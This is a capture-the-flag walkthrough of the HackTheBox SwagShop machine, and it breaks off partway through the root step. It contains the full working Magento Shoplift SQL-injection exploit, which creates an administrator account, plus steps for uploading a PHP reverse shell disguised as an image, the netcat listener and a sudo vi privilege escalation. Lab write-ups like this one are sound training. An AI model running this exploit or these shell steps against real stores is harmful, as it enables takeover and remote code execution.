┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.140
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
| 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://swagshop.htb/
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.23 seconds
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.140
68/udp open|filtered dhcpc
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1042.92 seconds
┌──(kali💀kali)-[~/Desktop]
└─$ nikto -h http://10.10.10.140
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://swagshop.htb/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /favicon.ico: identifies this app/server as: Magento Go CMS. See: https://en.wikipedia.org/wiki/Favicon
+ /app/: Directory indexing found.
+ /app/: This might be interesting.
+ /includes/: Directory indexing found.
+ /includes/: This might be interesting.
+ /lib/: Directory indexing found.
+ /lib/: This might be interesting.
+ /install.php: install.php file found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /RELEASE_NOTES.txt: A database error may reveal internal details about the running database.
+ /RELEASE_NOTES.txt: Magento Shop Changelog identified.
+ /skin/adminhtml/default/default/media/editor.swf: Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See: https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/
+ /skin/adminhtml/default/default/media/uploader.swf: Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See: https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/
+ /skin/adminhtml/default/default/media/uploaderSingle.swf: Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See: https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/
+ /var/: Directory indexing found.
+ /var/: /var directory has indexing enabled.
+ 8060 requests: 1 error(s) and 20 item(s) reported on remote host
+ End Time: 2024-01-09 00:17:56 (GMT-5) (5655 seconds)
It’s running Magento, which is an open-source e-commerce platform written in PHP. Considering that it is an off the shelf software, we’ll probably find reported vulnerabilities that are associated to it. But first, we need to get a version number. Notice that at the bottom of the page, it has a copyright detailing the year 2014, which is 6 years ago, so it’s very likely to be vulnerable. Just like there is a scanner for WordPress applications (WPScan), there is one for Magento applications that is called Mega scan. Let’s use it to run a scan on the application.
It reports the version number being 1.9.0.0 or 1.9.0.1 and they’re using the Community edition. There are no installed modules, so if we find any public vulnerabilities that are associated to modules, we can discard them. As for the unreachable path check, the last two paths don’t give us anything useful. However, the first path, gives us an xml file that leaks the swagshop mysql database username and password.
The first three exploits don’t match our version, so we’ll ignore them. The next two might be useful. Since Mage Scan didn’t report plugins, we’ll ignore the plugin vulnerabilities. The two after that might be relevant to our version. Lastly, we’ll also ignore the eBay Magento exploits.
We narrowed down our exploits to four possible options: 39838,37811,19793 and 37977. We’ll start off with looking into exploit number 37977 because it doesn’t require authentication and it is an RCE vulnerability.
-m: mirror an exploit to the current working directory.
After skimming through the code of the exploit,it seems to be chaining several SQL injection vulnerabilities together that eventually create an administrative account on the system with the username/password forme/forme.
To get the code working on our application, we need to make a few changes:
Remove all the uncommented comments & explanation (or you’ll get compilation errors)
Change the target variable to http://10.10.10.140/
Change the username/password to random/random (optional). Run the exploit.
┌──(kali💀kali)-[~/Desktop]
└─$ python 37977.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
DID NOT WORK
It didn’t work and it doesn’t give us much of an explanation why. So let’s redirect all the traffic from the script to Burp. To do that, perform the following steps.
In Burp, visit Proxy > Options > Proxy Listeners > Add. In the Binding tab, set the Bind port to 8081 and and in the Request Handling tab, set the Redirect to host option to 10.10.10.140 and the Redirect to Port option to 80. Make sure to select the newly added listener once you’re done.
Go back to the script and change the target to http://localhost:8081
In Burp set intercept to be on.
This way all the traffic of the script will go through Burp first. Run the script again and send the request to Repeater. In Repeater, execute the request. As shown in the above image, the script is failing because it’s not finding the URL. Let’s try it in our browser.
I noticed that we have admin panel at http://swagshop.htb/index.php/admin and not at http://swagshop.htb/admin. I changed the script a bit to:
##################################################################################################
#Exploit Title : Magento Shoplift exploit (SUPEE-5344)
#Author : Manish Kishan Tanwar AKA error1046
#Date : 25/08/2015
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Debugged At : Indishell Lab(originally developed by joren)
##################################################################################################
import requests
import base64
import sys
target = "http://swagshop.htb/index.php/"
if not target.startswith("http"):
target = "http://" + target
if target.endswith("/"):
target = target[:-1]
target_url = target + "/admin/Cms_Wysiwyg/directive/index/"
q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""
query = q.replace("\n", "").format(username="forme", password="forme")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url,
data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
"filter": base64.b64encode(pfilter),
"forwarded": 1})
if r.ok:
print "WORKED"
print "Check {0}/admin with creds forme:forme".format(target)
else:
print "DID NOT WORK"
┌──(kali💀kali)-[~/Desktop]
└─$ python 37977.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
WORKED
Check http://swagshop.htb/index.php/admin with creds forme:forme
Let’s login into Magneto using the following credentials:
http://swagshop.htb/index.php/admin
Username: forme
Password: forme
Now, we are in the Magento Admin Panel. There are a bunch of different methods in which we can get the shell but we decided to use the “Froghopper” Attack. It is a File Upload attack. It got its name from the pepe frog image that was used as a meme to get the shell by the author of the exploit. The files uploaded are not accessible in their raw form which will prevent us from executing them. This can be bypassed by allowing Symlinks in Developer Settings (System > Configuration > developer > Template Settings)
Magneto have built-in feature to restrict the malicious extensions of the files that can cause harm. Hence all it allows are PNG, JPG, GIF etc. The protection mechanism checks for the header and the extension but not for the contents of the file being uploaded. This means that we can craft payload in such a way that we are able to upload it to the target system. Hence, we took the reverse shell script and added GIF98 on top of it to be able to upload it.
GIF98
Now we create a new category, named Demo. It needs to be active for the payload to work. Then upload the reverse shell script with double extension as shown in the image below.
Demo
Yes
php-reverse-shell.php.png
Now proceed to the Newsletter Section and Click on Add New Template. In the Newsletter Template fill in the form with dummy details and then in the text filed add the path of template i.e., the reverse shell script as shown below.
Now getting back to the Newsletter Template Section, we see that our newly created newsletter is visible. Before executing it, we run a listener on the port mentioned in the reverse shell. After that, we proceed to Preview the Newsletter template as shown in the image below.
┌──(kali💀kali)-[~/Desktop]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.140] 37208
Linux swagshop 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
06:40:04 up 9:34, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@swagshop:/$
www-data@swagshop:/$ cd /home/haris
www-data@swagshop:/home/haris$ cat user.txt
3a79acc----------------------------
Privesc to root
We checked the sudo permissions and found that we can run vi with root privileges but inside /var/www/html/. We use the vi for editing the index.php inside the /var/www/html.
www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
Read Flag:
The fastest path to the flag is just to open it with vi. Based on the sudo output above, I’ll run:
